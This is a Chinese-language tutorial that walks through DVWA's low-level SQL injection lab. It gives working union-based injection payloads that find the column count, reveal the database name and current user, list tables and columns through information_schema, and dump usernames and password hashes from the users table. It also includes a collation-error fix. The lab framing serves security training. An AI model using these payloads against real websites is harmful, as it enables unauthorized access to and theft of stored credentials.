[网络安全]DVWA之SQL注入—low level解题详析

免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。
DVWA请读者自行安装,本文不再赘述。

判断漏洞类型

  • 判断是否为数字型注入

若为数字型注入,则第二个语句应回显Error或没有回显。

  • 判断是否为字符型注入

第二个语句没有回显,所以该漏洞类型为字符型注入漏洞。

判断注入点个数

输入1' order by 4#时,回显Unknown column '4' in 'order clause'

说明猜测的注入点个数过大

输入1' order by 2#时,回显如下:
说明注入点个数为2或3

输入1' order by 3#时,回显Unknown column '3' in 'order clause'

所以注入点个数为两个

爆库名

输入1' union select 1,database()#

回显一个数据库名

图片中第一段为第一个注入点的信息,第二段为第二个注入点(即database)的信息。

爆当前用户名

输入1' union select 1,user()#

由于注入点有两个,所以我们可以通过一个sql语句既查询数据库名又查询当前用户名

输入1' union select user(),database()#

注意,如果使用1' union select user()#的话,会回显The used SELECT statements have a different number of columns(所使用的 SELECT 语句具有不同数量的列),因为该语句的注入点只有一个。

爆表名

输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

回显guestbook和users两个表名
也可采用如下语句
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
其中,group_concat的作用是将多个值连接成一个字符串,并用逗号连接。

爆列名

输入1' union select 1, column_name from information_schema.columns where table_name='users'#
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
相比之下,在查询结果过多的情况下,建议使用group_concat将查询结果集合起来

爆字段

输入1' union select user,password from users#

报错分析及解决方法

若SQL联合注入过程中出现该报错:illegal mix of collations for operation UNION
原因如下:information_schema里的table的排序规则是utf8_general_ci,而user表中字段默认为utf8_unicode_ci,导致字符排序不匹配。
解决方法:

  1. 在phpstudy中打开phpMyAdmin
  1. 进入dvwa数据库中的user表,将各列排序规则修改为utf8_gengeral_ci,保存即可。
相关推荐
数智化精益手记局7 小时前
4m变更管理实战:拆解4m变更管理四大要素的管控功能与常见难题
大数据·数据结构·数据库·人工智能·精益工程
pele7 小时前
如何解决多线图中线条颜色不渲染(仅标记和提示框显示颜色)的问题
jvm·数据库·python
银河系的一束光7 小时前
net start mysql 服务名无效。 请键入 NET HELPMSG 2185 以获得更多的帮助
数据库·mysql
untE EADO7 小时前
MySQL错误-this is incompatible with sql_mode=only_full_group_by完美解决方案
android·sql·mysql
forEverPlume7 小时前
golang如何排查大量goroutine性能问题_golang大量goroutine性能排查详解
jvm·数据库·python
2401_883600257 小时前
Golang怎么CGO交叉编译_Golang如何在交叉编译时处理CGO依赖问题【避坑】
jvm·数据库·python
Irene19917 小时前
(课堂笔记)SQL基础语法分类总结表
数据库·sql
你觉得脆皮鸡好吃吗8 小时前
SQL注入 手工注入
网络·数据库·sql·安全·web安全·网络安全学习
dishugj8 小时前
psql-客户端工具日常使用命令整理
数据库·postgresql
m0_737539378 小时前
数据库主从复制和读写分离
数据库·oracle